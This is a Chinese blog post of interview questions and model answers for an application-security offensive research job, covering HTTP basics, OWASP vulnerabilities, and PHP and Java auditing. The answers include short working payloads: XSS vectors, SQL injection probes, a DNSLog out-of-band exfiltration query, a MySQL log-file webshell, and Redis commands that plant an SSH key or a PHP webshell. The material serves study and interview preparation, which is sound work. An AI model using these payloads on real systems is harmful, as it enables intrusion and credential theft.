2025年渗透测试面试题总结-匿名[校招]攻防研究员(应用安全)(题目+回答)
安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
匿名[校招]攻防研究员(应用安全)
基础部分
1. HTTP状态码
2. HTTP请求方法及作用
3. 网络分层及协议
OWASP Top 10
1. XSS代码执行方式
2. XSS常用标签及绕过
3. HttpOnly的作用及绕过
4. 判断SQL注入存在
5. 无回显注入处理
6. MySQL延时注入其他姿势
7. DNSLog原理
8. 单引号被拦截绕过
9. MySQL写Shell的其他方式
10. Redis利用命令
11. SSRF利用
PHP安全
1. 审计流程
2. 命令执行函数
3. 文件上传函数
4. 代码执行函数
5. Vendor目录作用
6. PHPUnit漏洞
7. 无文件Shell实现
Java安全
1. 通用漏洞组合利用
2. 命令执行函数
3. 框架审计重点
4. 审计流程与关注点
5. Tomcat回显构造
6. 内存马实现
其他
1. POC/EXP开发心得
2. Linux提权姿势
3. 渗透关注文件
4. Dirty Cow时间及修复
5. 未提及的擅长点
匿名[校招]攻防研究员(应用安全)
### 基础1. http状态码,502,503,501 2. http请求方式及各自作用 3. 计算机网络的分层及分别有哪些协议### **owasp top 10**1. xss如何执行代码 2. xss常用哪些标签 3. http only 4. 怎样判断是否存在注入 5. sql注入无回显怎么办 6. 延时注入除了sleep的其他姿势(mysql) 7. dnslog的实现原理 8. sql注入,单引号被拦截,如何绕过 9. sql注入,写shell的语句,除了into outfile还有什么mysql的特性可以getshell 10. redis的利用,如何shell,相关命令 11. ssrf的原理即后利用,怎么执行命令,常搭配使用的协议### PHP安全相关1. 审计流程 2. 命令执行函数 3. 文件上传函数 4. 代码执行函数 5. vender目录 6. phpunit 7. php可以构造无文件shell吗### **Java安全相关**1. 挖过的通用洞,你会怎么利用(组合) 2. 命令的函数或包 3. java哪些框架,审过哪些框架,它们常出现的问题是什么 4. 审计流程,你一般关注哪些洞,或擅长挖哪种类型 5. tomcat做回显 6. 内存马的实现### **其他**- 写poc/exp的经历和心得 - 复现的一些漏洞 - Linux 提权的姿势 - Linux下有哪些文件进行渗透时比较关注的,及文件权限问题 - dirty cow 的时间及其修复版本(哪年后就没法用了) - 你觉得什么是你自己比较擅长的而我没有问到的. ### **小结**这个岗位主要是搞漏洞挖掘和利用以及原理分析,Web方面就是JAVA和PHP的安全研究,比如JAVA下的流行框架,组件和服务器应用的安全问题。 没有问内网!!!基础部分
1. HTTP状态码
- 502(Bad Gateway):代理服务器从上游服务器接收到无效响应。常见于反向代理配置问题。
- 503(Service Unavailable):服务器暂时无法处理请求,通常因维护或过载。
- 501(Not Implemented):服务器不支持请求方法(如使用非标准的HTTP方法)。
2. HTTP请求方法及作用
- GET:获取资源(无副作用)。
- POST:提交数据(如表单)。
- PUT:替换目标资源。
- DELETE:删除资源。
- HEAD:获取资源的元信息(不返回Body)。
- OPTIONS:查询服务器支持的请求方法。
3. 网络分层及协议
- 应用层:HTTP、FTP、DNS、SMTP。
- 传输层:TCP(可靠传输)、UDP(低延迟)。
- 网络层:IP、ICMP、ARP。
- 数据链路层:Ethernet、PPP。
- 物理层:物理介质规范。
OWASP Top 10
1. XSS代码执行方式
- 反射型:攻击载荷通过URL参数注入并反射到页面执行。
- 存储型:恶意脚本存储到数据库(如评论字段),用户访问时触发。
- DOM型:由前端JavaScript操作DOM时触发(无需服务端参与)。
2. XSS常用标签及绕过
- 经典标签:
<script>,<img src=1 onerror=alert(1)>,<svg/onload=...>。- 事件属性:
onmouseover,onload,onerror。- 编码绕过:Hex/Unicode编码(如
javascript:alert(1)→\x6A\x61...)。3. HttpOnly的作用及绕过
- 作用:防止JavaScript读取Cookie(缓解XSS窃取会话)。
- 绕过:通过其他漏洞(如浏览器缓存劫持、中间人攻击)获取Cookie。
4. 判断SQL注入存在
- 报错型:输入单引号触发数据库错误(如
'→You have an error...)。- 布尔盲注:构造
AND 1=1和AND 1=2观察页面差异。- 时间盲注:通过
SLEEP()判断响应延迟。5. 无回显注入处理
- 外带数据:利用DNSLog或HTTP请求外传数据(如
LOAD_FILE('\\\\xxx.dnslog.cn\\test'))。- 盲注攻击:布尔或时间盲注逐位提取数据。
6. MySQL延时注入其他姿势
- Benchmark函数:
BENCHMARK(1000000, MD5('test'))。- 条件运算:
IF(1=1, SLEEP(5), 0)。7. DNSLog原理
- 实现:攻击者控制域名服务器,触发目标解析特定子域名(如
payload.attacker.com),通过DNS查询日志获取注入结果。8. 单引号被拦截绕过
- 宽字节注入:利用GBK编码转换(如
%df%27→ 吞掉转义符)。- 数字型注入:无需引号的注入点(如
id=1 AND 1=1)。9. MySQL写Shell的其他方式
- 日志文件写入:
sqlSET global general_log = 'ON'; SET global general_log_file = '/var/www/html/shell.php'; SELECT '<?php @eval($_POST[1]);?>';- 全局变量:利用
secure_file_priv为空时直接写文件。10. Redis利用命令
- 写SSH密钥:
bashconfig set dir /root/.ssh config set dbfilename authorized_keys set x "\n\nssh-rsa AAAAB3N...\n\n" save- 写Webshell:
bashconfig set dir /var/www/html set x "<?php system($_GET['cmd']);?>" save11. SSRF利用
- 原理:服务端发起任意HTTP请求,攻击内网或本机服务。
- 协议利用:
- File协议:读取本地文件(
file:///etc/passwd)。- Gopher:构造TCP流量攻击内网Redis/MySQL。
- 命令执行:结合CRLF注入或协议特性(如Redis的
eval命令)。
PHP安全
1. 审计流程
- 入口点分析:定位用户输入(
$_GET、$_POST)。- 危险函数跟踪:如
eval、system、unserialize。- 参数传递路径:追踪变量是否未过滤直接进入敏感函数。
2. 命令执行函数
- 高危函数:
system、exec、passthru、shell_exec、反引号(`)。- 间接执行:
popen、proc_open。3. 文件上传函数
- 核心函数:
move_uploaded_file(结合is_uploaded_file验证)。- 漏洞场景:未校验后缀/MIME类型,或黑名单不全(如
.phar绕过)。4. 代码执行函数
- 动态执行:
eval、assert、create_function。- 回调函数:
array_map、call_user_func。5. Vendor目录作用
- 用途:存放Composer依赖包,可能包含漏洞组件(如未更新的
guzzlehttp)。6. PHPUnit漏洞
- 历史漏洞:CVE-2017-9841(远程代码执行,因
eval-stdin.php未删除)。7. 无文件Shell实现
- 内存驻留:通过反序列化漏洞加载恶意类(需
unserialize可控)。- 伪协议:利用
php://input执行代码(需allow_url_include=On)。
Java安全
1. 通用漏洞组合利用
- 框架漏洞:Struts2 OGNL注入 + Fastjson反序列化。
- 组件链:利用
commons-collections链触发RCE。2. 命令执行函数
- 核心类:
Runtime.getRuntime().exec()、ProcessBuilder。- 反射调用:通过反射绕过黑名单检测。
3. 框架审计重点
- Spring:SPEL表达式注入(CVE-2022-22963)、未授权端点。
- Hibernate:HQL注入(非预编译查询)。
- Fastjson:反序列化漏洞(利用AutoType特性)。
4. 审计流程与关注点
- 入口点:HTTP请求处理、RPC接口、JSON/XML解析。
- 擅长方向:反序列化链构造、表达式注入、权限绕过逻辑。
5. Tomcat回显构造
- 线程注入:通过反射获取
Response对象(如从ThreadLocal提取)。- 内存马适配:注入Filter或Servlet动态注册恶意逻辑。
6. 内存马实现
- Filter型:插入恶意Filter到责任链头部。
- Agent型:动态修改字节码(如利用
javassist)。
其他
1. POC/EXP开发心得
- 关键点:漏洞触发条件精准复现、兼容性处理(如版本差异)。
- 案例:Fastjson反序列化EXP需构造特定Gadget链。
2. Linux提权姿势
- 内核漏洞:Dirty Cow(CVE-2016-5195)、sudo权限滥用(CVE-2021-3156)。
- SUID滥用:find、vim等可执行文件提权。
3. 渗透关注文件
- 敏感文件:
/etc/passwd、/etc/shadow、SSH密钥(~/.ssh/id_rsa)。- 权限问题:全局可写文件(
find / -perm -o=w)。4. Dirty Cow时间及修复
- 时间:2016年10月披露,影响Linux内核≤4.8.3。
- 修复版本:4.8.3以上内核已修补。
5. 未提及的擅长点
- 反序列化漏洞链分析:Java/PHP反序列化利用链构造与调试。
- 框架组件0day挖掘:基于源码分析或黑盒Fuzz。
相关文章:
2025年渗透测试面试题总结-匿名[校招]攻防研究员(应用安全)(题目+回答)
安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。 目录 匿名[校招]攻防研究员(应用安全) 基础部分 1. HTTP状态码 2. HTTP请求方法及作用 3. 网络分层及协议 OW…...
碰一碰发视频系统--基于H5场景开发
#碰一碰发视频# 旨在构建一个基于移动网页(H5)的视频“碰传”交互系统,提供类似华为/苹果设备 NFC 轻碰分享的便捷体验。其核心技术依赖于移动端可用的近场通信(NFC 或 H5 相关 API)和可靠的媒体数据传输方案。实现细节…...
MagicAnimate 论文解读:引入时间一致性的视频人物动画生成方法
1. 前言/动机 问题:现有动画生成方法缺乏对时间信息的建模,常常出现时间一致性差的问题 描述: 现有的动画生成方法通常采用帧变形(frame-warping)技术,将参考图像变形以匹配目标动作。尽管这类方法能生成较…...
QT使用说明
QT环境准备 推荐Ubuntu平台上使用,配置简单,坑少。 Ubuntu 20.04 安装 sudo apt-get install qt5-default -y sudo apt-get install qtcreator -y sudo apt-get install -y libclang-common-8-dev启动 qtcreatorHelloWorld 打开 Qt Creator。选择 …...
数据结构:递归(Recursion)
目录 示例1:先打印,再递归 示例2:先递归,再打印 递归的两个阶段 递归是如何使用栈内存 复杂度分析 递归中的静态变量 内存结构图解 递归:函数调用自己 必须有判断条件来使递归继续或停止 我们现在通过这两个示…...
Cesium快速入门到精通系列教程一:打造第一个Cesium应用
一、打造第一个Cesium应用 1、官方渠道下载Cesium(可选择历史版本) GitHub Releases页面:https://github.com/CesiumGS/cesium/releases 访问 Cesium GitHub Releases,此处列出了所有正式发布的版本。 通过标签&#…...
力扣题解106:从中序与后序遍历序列构造二叉树
一、题目内容 题目要求根据二叉树的中序遍历序列和后序遍历序列来重建二叉树。具体来说,我们需要利用中序遍历序列和后序遍历序列的特点,通过递归的方法逐步构建出完整的二叉树。 中序遍历序列的特点是:左子树 -> 根节点 -> 右子树。后…...
Vue传参Props还是Pinia
Pinia 适用场景 全局状态管理 多个不相关组件需要共享数据需要跨页面/路由共享状态 复杂状态逻辑 包含多个相互关联的状态有复杂的状态修改逻辑 持久化需求 需要将状态保存到localStorage/sessionStorage页面刷新后需要恢复状态(恢复最后一次修改的状态࿰…...
学习STC51单片机25(芯片为STC89C52RCRC)
每日一言 生活就像弹簧,你弱它就强,你强它就弱,别轻易认输。 ESP8266作为路由器模式(AP模式)也就是在局域网内可以有服务器的作用 那么我们需要将pc作为设备进行连接ESP的发射出来的WIFE 叫做这个AI啥的 也有可能叫做…...
宁夏农业科技:创新引领,赋能现代农业新篇章
在广袤的宁夏大地上,农业科技如同一股强劲的春风,吹拂着每一寸土地,为宁夏的农业发展注入了新的活力与希望。近年来,宁夏农业科技以其独特的创新力和实践力,不断推动着现代农业的转型升级,让这片古老的土地…...
Accelerate 2025北亚巡展正式启航!AI智御全球·引领安全新时代
近日,网络安全行业年度盛会Accelerate 2025北亚巡展正式在深圳启航!智库专家、产业领袖及Fortinet高管、产品技术团队和300余位行业客户齐聚一堂,围绕“AI智御全球引领安全新时代”主题,共同探讨AI时代网络安全新范式。大会聚焦三…...
005学生心理咨询评估系统技术解析:搭建科学心理评估平台
学生心理咨询评估系统技术解析:搭建科学心理评估平台 在心理健康教育日益受重视的当下,学生心理咨询评估系统成为了解学生心理状态的重要工具。该系统涵盖试卷管理、试题管理等核心模块,面向管理员和用户两类角色,通过前台展示与…...
azure devops 系列 - 常用的task
任务在管道中执行操作。例如,任务可以构建应用、与 Azure 资源交互、安装工具或运行测试。任务是定义管道中自动化的构建基块。 运行作业时,所有任务都会按顺序依次运行。要在多个代理上并行运行同一组任务,或者在不使用代理的情况下运行某些任务,使用job。 Build Task …...
贪心算法应用:多重背包启发式问题详解
贪心算法应用:多重背包启发式问题详解 多重背包问题是经典的组合优化问题,也是贪心算法的重要应用场景。本文将全面深入地探讨Java中如何利用贪心算法解决多重背包问题。 多重背包问题定义 **多重背包问题(Multiple Knapsack Problem)**是背包问题的变…...
【保姆级教程】PDF批量转图文笔记
如果你有一个PDF文档,然后你想把它发成图文笔记emmm,最好再加个水印,你会怎么做? 其实也不麻烦,打开PDF文档,挨个截图,然后打开PS一张一张图片拖进去,再把水印图片拖进去࿰…...
Pytest Fixture 是什么?
Fixture 是什么? Fixture 是 Pytest 测试框架的核心功能之一,用于为测试函数提供所需的依赖资源或环境。它的核心目标是: ✅ 提供测试数据(如模拟对象、数据库记录) ✅ 初始化系统状态(如配置、临时文件&a…...
Spring Boot 基础知识全面解析:快速构建企业级应用的核心指南
一、Spring Boot 概述:重新定义 Java 开发 1.1 什么是 Spring Boot? Spring Boot 是基于 Spring 框架的快速开发框架,旨在简化 Spring 应用的初始搭建及开发过程。它通过 「约定优于配置」(Convention Over Configuration&#…...
数据库系统概论(十一)SQL 集合查询 超详细讲解(附带例题表格对比带你一步步掌握)
数据库系统概论(十一)SQL 集合查询 超详细讲解(附带例题表格对比带你一步步掌握) 前言一、什么是集合查询?二、集合操作的三种类型1. 并操作2. 交操作3. 差操作 三、使用集合查询的前提条件四、常见问题与注意事项五、…...
[mcu]系统频率
系统主频的选择直接影响性能、功耗和成本,不同厂商的芯片会根据应用场景设计不同的运行频率。 低频段80MHZ~160MHz 典型频率: 80MHz、120MHz、160MHz 特点: 低功耗,适合电池供电设备 处理能力有限,通常仅支持 单天线…...
clickhouse如何查看操作记录,从日志来查看写入是否成功
背景 插入表数据后,因为原本表中就有数据,一时间没想到怎么查看插入是否成功,因为对数据源没有很多的了解,这时候就想怎么查看下插入是否成功呢,于是就有了以下方法 具体方法 根据操作类型查找,比如inse…...
5G-A:开启通信与行业变革的新时代
最近,不少细心的用户发现手机信号标识悄然发生了变化,从熟悉的 “5G” 变成了 “5G-A”。这一小小的改变,却蕴含着通信技术领域的重大升级,预示着一个全新的通信时代正在向我们走来。今天,就让我们深入了解一下 5G-A&a…...
鸿蒙OS在UniApp中集成Three.js:打造跨平台3D可视化应用#三方框架 #Uniapp
在UniApp中集成Three.js:打造跨平台3D可视化应用 引言 在最近的一个项目中,我们需要在UniApp应用中展示3D模型,并实现实时交互功能。经过技术选型和实践,我们选择了Three.js作为3D渲染引擎。本文将分享我们在UniApp中集成Three.…...
Vue 3 组件化设计实践:构建可扩展、高内聚的前端体系
Vue 3 自发布以来,其引入的 Composition API 与改进的组件模型,为前端架构提供了更强的可组合性、复用性与模块化能力。本文将系统性探讨 Vue 3 如何通过组件化设计,实现复杂应用的解耦、扩展与维护,并结合实际工程经验提供最佳实…...
腾讯云 Python3.12.8 通过yum安装 并设置为默认版本
在腾讯云服务器上,直接通过 yum 安装 Python 3.12.8 可能不可行,因为标准仓库通常不包含最新的 Python 版本。不过,我们可以通过添加第三方仓库或手动安装 RPM 包的方式实现。以下是完整解决方案: 方法 1: 通过第三方仓库安装&am…...
鸿蒙OSUniApp页面切换动效实战:打造流畅精致的转场体验#三方框架 #Uniapp
UniApp页面切换动效实战:打造流畅精致的转场体验 引言 在移动应用开发中,页面切换动效不仅能提升用户体验,还能传达应用的品质感。随着HarmonyOS的普及,用户对应用的动效体验要求越来越高。本文将深入探讨如何在UniApp中实现流畅…...
React 泛型组件:用TS来打造灵活的组件。
文章目录 前言一、什么是泛型组件?二、为什么需要泛型组件?三、如何在 React 中定义泛型组件?基础泛型组件示例使用泛型组件 四、泛型组件的高级用法带默认类型的泛型组件多个泛型参数 五、泛型组件的实际应用场景数据展示组件表单组件状态管…...
TDengine 集群运行监控
简介 为了确保集群稳定运行,TDengine 集成了多种监控指标收集机制,并通过 taosKeeper 进行汇总。taosKeeper 负责接收这些数据,并将其写入一个独立的 TDengine 实例中,该实例可以与被监控的 TDengine 集群保持独立。TDengine 中的…...
图像任务中的并发处理:线程池、Ray、Celery 和 asyncio 的比较
在图像缺陷检测任务中,处理大量图像和点云数据时,高效的并发处理是关键。本文将介绍五种流行的并发处理方法:线程池(concurrent.futures.ThreadPoolExecutor)、Ray、Celery、asyncio以及搜狗Workflow,并从原…...
DeepSeek 赋能智能物流:解锁仓储机器人调度的无限可能
目录 一、智能物流仓储机器人调度现状1.1 传统调度面临的挑战1.2 现有智能调度的进展与局限 二、DeepSeek 技术探秘2.1 DeepSeek 核心技术原理2.2 DeepSeek 的独特优势 三、DeepSeek 在智能物流仓储机器人调度中的创新应用3.1 智能任务分配与调度3.2 路径规划与避障优化3.3 实时…...
C#上传图片后压缩
上传的图片尺寸不一,手机拍照的有2000*2000像素的,对实际使用来说 文件尺寸太大,文件也有近4M 下面是直接压缩的方法 1、安装包 Magick.NET-Q16-AnyCPU 2、上代码 /// <summary> /// 缩放图片 /// </summary> /// <param …...